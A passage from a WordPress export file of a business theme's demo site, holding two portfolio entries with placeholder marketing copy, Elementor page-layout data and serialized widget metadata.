on_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Enterprise Loan</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/enterprise-loan/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=830</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>January 12, 2018</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>830</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[enterprise-loan]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[831]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[832]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"7adbf0ca","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"14f0c251","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"431e8d5","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"61d4ce9c","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"24904d7d","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"771bc1d8","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"21ed026b","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"ca6bc03","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"49ed3d5a","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3fabd3ac","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"17e6f8b0","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"b60571d","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"68f7ccb0","elType":"widget","settings":{"editor":"<p>January 12, 2018<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2502bf2","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"36dfc991","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"25e1e05c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"5d14aed4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"6e1392f9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"81306c7","elType":"section","settings":[],"elements":[{"id":"5001425","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"a0444ee","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7a60eb1","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ab557ce","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"b3746ac","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"3224705","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"fda4a6f","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"12dda7b","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"905356f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7c5e65f","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"996cbae","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"871cbac","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"8c2ebd2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"169de63","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"98142c0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"696d01c","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"bfa0189","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"86bdb6a","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"fba0698","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"499c166","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"d0c070c","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b91ec84","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"69a0300","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"6066496","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Marketing</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/</link>
		<pubDate>Fri, 11 Sep 2020 07:16:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=837</guid>
		<description></description>
		<content:encoded><![CDATA[Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.
<h6>Client:</h6>
OceanThemes
<h6>Website:</h6>
oceanthemes.net
<h6>Date:</h6>
August 14, 2020
<h6>Category:</h6>
Marketing/Finance

